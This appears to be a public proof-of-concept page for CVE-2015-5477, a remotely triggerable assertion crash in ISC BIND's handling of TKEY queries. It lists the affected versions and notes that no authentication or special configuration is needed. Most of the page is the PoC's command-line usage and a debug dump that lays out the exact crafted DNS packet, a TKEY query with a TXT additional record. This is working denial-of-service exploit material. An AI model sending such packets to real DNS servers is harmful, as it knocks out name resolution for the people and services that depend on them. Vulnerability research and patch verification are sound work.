pub

CVE-2015-5477 - An error in handling TKEY queries can cause named to exit with a REQUIRE assertion failure

Overview

cvss    :  7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) base  

vendor  :  ISC Bind 
product :  BIND   
versions affected:   < 9.9.7-P2
                     < 9.10.2-P3
					
exploitability :
			* remotely exploitable
			* NO authentication required
			* NO user interaction required
			* NO special configuration required (default settings)
			** NO configuration workaround

Abstract

For more information see original advisory: https://kb.isc.org/article/AA-01272

Proof of Concept (PoC)

# python cve-2015-5477/poc_cve-2015-5477.py  <target>
[ ] CVE-2015-5477 BIND 9 PoC
[i] target: <target>
 [+] sending DNSQ TKEY with additional record ...
 [!] pkt sent!


# python cve-2015-5477/poc_cve-2015-5477.py  <target> --debug
[ ] CVE-2015-5477 BIND 9 PoC
[i] target: <target>
 [+] sending DNSQ TKEY with additional record ...
###[ DNS ]###
  id        = 0
  qr        = 0
  opcode    = QUERY
  aa        = 0
  tc        = 0
  rd        = 1
  ra        = 0
  z         = 0
  ad        = 0
  cd        = 0
  rcode     = ok
  qdcount   = 1
  ancount   = 0
  nscount   = 0
  arcount   = 1
  \qd        \
   |###[ DNS Question Record ]###
   |  qname     = '.'
   |  qtype     = 249
   |  qclass    = ANY
  an        = None
  ns        = None
  ar        = None
###[ DNS Resource Record ]###
     rrname    = '.'
     type      = TXT
     rclass    = ANY
     ttl       = 0
     rdlen     = 2
     rdata     = 'x'
.
Sent 1 packets.
 [!] pkt sent!

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2015-5477

(0x721427D8)

This site is open source. Improve this page.